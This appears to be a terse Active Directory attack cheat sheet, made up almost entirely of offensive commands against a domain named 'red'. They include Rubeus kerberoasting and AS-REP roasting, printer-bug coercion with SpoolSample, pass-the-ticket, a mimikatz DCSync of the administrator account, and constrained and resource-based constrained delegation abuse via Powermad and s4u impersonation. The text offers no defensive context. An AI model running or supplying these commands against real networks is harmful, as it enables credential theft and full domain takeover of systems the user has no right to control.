Check GPOs which enable group of users to have remote access (PsExec, WMI, WinRM, RDP, etc) to specific hosts.
rubeus.exe kerberoast /user:svc_sql /nowrap
rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap
rubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap
Spoolsample.exe reddc redsqlw
rubeus.exe ptt /ticket:[ticket]
mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator
rubeus.exe tgtdeleg /nowrap
rubeus.exe s4u /impersonate:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt
ipmo .\powermad.ps1
New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)
ipmo .\Microsoft.ActiveDirectory.Management.dll
Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose
rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt
If it is not accessible directly, use SOCKS to access it.
Any computer/users' name contain "web", "svc", etc.
